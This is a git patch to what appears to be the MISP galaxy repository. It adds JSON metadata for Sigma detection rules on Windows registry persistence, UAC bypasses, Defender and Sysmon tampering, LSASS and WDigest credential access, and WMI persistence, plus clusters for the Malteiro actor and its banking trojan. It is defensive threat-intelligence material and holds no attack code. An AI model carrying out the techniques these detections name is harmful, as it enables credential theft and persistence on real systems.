"registry_set_susp_printer_driver.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "uuid": "b7916c2a-fa2f-4795-9477-32b731f70f11", + "value": "Registry Persistence via Explorer Run Key", + "meta": { + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2018/07/18", + "filename": "registry_set_susp_reg_persist_explorer_run.yml", + "author": "Florian Roth, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "uuid": "02ee49e2-e294-4d0f-9278-f5b3212fc588", + "value": "New RUN Key Pointing to Suspicious Folder", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2018/08/25", + "filename": "registry_set_susp_run_key_img_folder.yml", + "author": "Florian Roth, Markus Neis, Sander Wiebing", + "level": "high", + "falsepositive": [ + "Software using weird folders for updates" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", + "uuid": "f2485272-a156-4773-82d7-1d178bc4905b", + "value": "Suspicious Service Installed", + "meta": { + "refs": [ + "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_service_installed.yml" + ], + "tags": [ + "attack.t1562.001", + "attack.defense_evasion" + ], + "creation_date": "2019/04/08", + "filename": "registry_set_susp_service_installed.yml", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "level": "medium", + "falsepositive": [ + "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "uuid": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "value": "Modify User Shell Folders Startup Value", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" + ], + "creation_date": "2022/10/01", + "filename": "registry_set_susp_user_shell_folders.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "uuid": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", + "value": "Scheduled TaskCache Change by Uncommon Program", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://labs.f-secure.com/blog/scheduled-task-tampering/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.t1053.005" + ], + "creation_date": "2021/06/18", + "filename": "registry_set_taskcache_entry.yml", + "author": "Syed Hasan (@syedhasan009)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects persistence method using windows telemetry", + "uuid": "73a883d0-0348-4be4-a8d8-51031c2564f8", + "value": "Registry Persistence Mechanism via Windows Telemetry", + "meta": { + "refs": [ + "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_telemetry_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005" + ], + "creation_date": "2020/10/16", + "filename": "registry_set_telemetry_persistence.yml", + "author": "Lednyov Alexey, oscd.community", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "uuid": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", + "value": "RDP Sensitive Settings Changed to Zero", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", + "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" + ], + "creation_date": "2022/09/29", + "filename": "registry_set_terminal_server_suspicious.yml", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "uuid": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "value": "RDP Sensitive Settings Changed", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", + "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" + ], + "creation_date": "2022/08/06", + "filename": "registry_set_terminal_server_tampering.yml", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "uuid": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "value": "Set TimeProviders DllName", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.003" + ], + "creation_date": "2022/06/19", + "filename": "registry_set_timeproviders_dllname.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", + "uuid": "dc5c24af-6995-49b2-86eb-a9ff62199e82", + "value": "COM Hijacking via TreatAs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", + "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ], + "creation_date": "2022/08/28", + "filename": "registry_set_treatas_persistence.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects UAC bypass method using Windows event viewer", + "uuid": "7c81fec3-1c1d-43b0-996a-46753041b1b6", + "value": "UAC Bypass via Event Viewer - Registry Set", + "meta": { + "refs": [ + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ], + "creation_date": "2017/03/19", + "filename": "registry_set_uac_bypass_eventvwr.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", + "uuid": "5b872a46-3b90-45c1-8419-f675db8053aa", + "value": "UAC Bypass via Sdclt", + "meta": { + "refs": [ + "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ], + "creation_date": "2017/03/17", + "filename": "registry_set_uac_bypass_sdclt.yml", + "author": "Omer Yampel, Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "uuid": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "value": "UAC Bypass Abusing Winsat Path Parsing - Registry", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "registry_set_uac_bypass_winsat.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "uuid": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "value": "UAC Bypass Using Windows Media Player - Registry", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/23", + "filename": "registry_set_uac_bypass_wmp.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "uuid": "46490193-1b22-4c29-bdd6-5bf63907216f", + "value": "VBScript Payload Stored in Registry", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2021/03/05", + "filename": "registry_set_vbs_payload_stored.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", + "uuid": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "value": "Execution DLL of Choice Using WAB.EXE", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml", + "https://twitter.com/Hexacorn/status/991447379864932352", + "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/13", + "filename": "registry_set_wab_dllpath_reg_change.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "uuid": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "value": "Wdigest Enable UseLogonCredential", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2019/09/12", + "filename": "registry_set_wdigest_enable_uselogoncredential.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "uuid": "0eb46774-f1ab-4a74-8238-1155855f2263", + "value": "Disable Windows Defender Functionalities Via Registry Keys", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", + "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/08/01", + "filename": "registry_set_windows_defender_tamper.yml", + "author": "AlertIQ, J\u00e1n Tren\u010dansk\u00fd, frack113, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Administrator actions" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", + "uuid": "f7997770-92c3-4ec9-b112-774c4ef96f96", + "value": "Winlogon AllowMultipleTSSessions Enable", + "meta": { + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/09/09", + "filename": "registry_set_winlogon_allow_multiple_tssessions.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitmate use of the multi session functionality" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "uuid": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", + "value": "Winlogon Notify Key Logon Persistence", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.004" + ], + "creation_date": "2021/12/30", + "filename": "registry_set_winlogon_notify_key.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", + "uuid": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", + "value": "Add DLLPathOverride Entry For Persistence", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/naturallanguage6.html", + "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/regsitry_set_natural_language_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "regsitry_set_natural_language_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects Accessing to lsass.exe by Powershell", + "uuid": "3f07b9d1-2082-4c56-9277-613a621983cc", + "value": "Accessing WinAPI in PowerShell for Credentials Dumping", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2020/10/06", + "filename": "sysmon_accessing_winapi_in_powershell_credentials_dumping.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", + "uuid": "8ac03a65-6c84-4116-acad-dc1558ff7a77", + "value": "Sysmon Configuration Change", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/01/12", + "filename": "sysmon_config_modification.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administrative action" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "uuid": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", + "value": "Sysmon Configuration Error", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ], + "creation_date": "2021/06/04", + "filename": "sysmon_config_modification_error.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate administrative action" + ], + "logsource.category": "sysmon_error", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "uuid": "1f2b5353-573f-4880-8e33-7d04dcf97744", + "value": "Sysmon Configuration Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ], + "creation_date": "2021/06/04", + "filename": "sysmon_config_modification_status.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate administrative action" + ], + "logsource.category": "sysmon_status", + "logsource.product": "windows" + } + }, + { + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario.", + "uuid": "e554f142-5cf3-4e55-ace9-a1b59e0def65", + "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_dcom_iertutil_dll_hijack.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" + ], + "creation_date": "2020/10/12", + "filename": "sysmon_dcom_iertutil_dll_hijack.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", + "uuid": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "value": "Sysmon Blocked Executable", + "meta": { + "refs": [ + "https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_block_exe.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/08/16", + "filename": "sysmon_file_block_exe.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_block", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "uuid": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "value": "Sysmon Process Hollowing Detection", + "meta": { + "refs": [ + "https://twitter.com/SecurePeacock/status/1486054048390332423?s=20", + "https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_process_hollowing.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.012" + ], + "creation_date": "2022/01/25", + "filename": "sysmon_process_hollowing.yml", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "level": "high", + "falsepositive": [ + "There are no known false positives at this time" + ], + "logsource.category": "process_tampering", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of WMI event subscription persistence method", + "uuid": "0f06a3a5-6a09-413f-8743-e6cf35561297", + "value": "WMI Event Subscription", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.003" + ], + "creation_date": "2019/01/12", + "filename": "sysmon_wmi_event_subscription.yml", + "author": "Tom Ueltschi (@c_APT_ure)", + "level": "medium", + "falsepositive": [ + "Exclude legitimate (vetted) use of WMI event subscription in your network" + ], + "logsource.category": "wmi_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious encoded payloads in WMI Event Consumers", + "uuid": "83844185-1c5b-45bc-bcf3-b5bf3084ca5b", + "value": "Suspicious Encoded Scripts in a WMI Consumer", + "meta": { + "refs": [ + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.persistence", + "attack.t1546.003" + ], + "creation_date": "2021/09/01", + "filename": "sysmon_wmi_susp_encoded_scripts.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "wmi_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "uuid": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "value": "Suspicious Scripting in a WMI Consumer", + "meta": { + "refs": [ + "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", + "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005" + ], + "creation_date": "2019/04/15", + "filename": "sysmon_wmi_susp_scripting.yml", + "author": "Florian Roth, Jonhnathan Ribeiro", + "level": "high", + "falsepositive": [ + "Legitimate administrative scripts" + ], + "logsource.category": "wmi_event", + "logsource.product": "windows" + } + } + ], + "version": 1 +} \ No newline at end of file diff --git a/galaxies/sigma-rules.json b/galaxies/sigma-rules.json new file mode 100644 index 0000000..2733e81 --- /dev/null +++ b/galaxies/sigma-rules.json @@ -0,0 +1,9 @@ +{ + "description": "Sigma Rules are used to detect suspicious behaviors related to threat actors, malware and tools", + "icon": "link", + "name": "Sigma-Rules", + "namespace": "misp", + "type": "sigma-rules", + "uuid": "9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2", + "version": 1 +} \ No newline at end of file From 3f4edb480baf9fb54952fe4a61df391ac819e732 Mon Sep 17 00:00:00 2001 From: Delta-Sierra Date: Fri, 16 Dec 2022 16:43:50 +0100 Subject: [PATCH 03/13] add Malteiro --- clusters/banker.json | 24 +++++++++++++++++++++++- clusters/threat-actor.json | 20 ++++++++++++++++++++ 2 files changed, 43 insertions(+), 1 deletion(-) diff --git a/clusters/banker.json b/clusters/banker.json index 38a2f19..c099f15 100644 --- a/clusters/banker.json +++ b/clusters/banker.json @@ -1195,7 +1195,29 @@ }, "uuid": "fa574138-a3bd-4ebc-a5f7-3b465df7106f", "value": "Dark Tequila" + }, + { + "description": "Distributed by Malteiro", + "meta": { + "refs": [ + "https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/" + ], + "synonyms": [ + "URSA" + ] + }, + "related": [ + { + "dest-uuid": "ba57c28a-47d0-46ba-a933-9aed69f7b84f", + "tags": [ + "estimative-language:likelihood-probability=\"likely\"" + ], + "type": "delivered-by" + } + ], + "uuid": "d27eea57-e55f-40b1-9690-55c2c8500876", + "value": "Malteiro" } ], - "version": 17 + "version": 18 } diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 3aa75c7..2c01817 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -9964,6 +9964,26 @@ ], "uuid": "e5865ca1-ec95-43e2-954a-d0f3507a9747", "value": "TAG-53" + }, + { + "description": "This group of cybercriminals is named Malteiroby SCILabs, they operate and distribute the URSA/Mispadu banking trojan.", + "meta": { + "refs": [ + "https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/", + "https://blog.scilabs.mx/cyber-threat-profile-malteiro/" + ] + }, + "related": [ + { + "dest-uuid": "d27eea57-e55f-40b1-9690-55c2c8500876", + "tags": [ + "estimative-language:likelihood-probability=\"likely\"" + ], + "type": "delivers" + } + ], + "uuid": "ba57c28a-47d0-46ba-a933-9aed69f7b84f", + "value": "Malteiro" } ], "version": 256 From d4debd619b1c1a38ca71119fdbf3f858c186f972 Mon Sep 17 00:00:00 2001 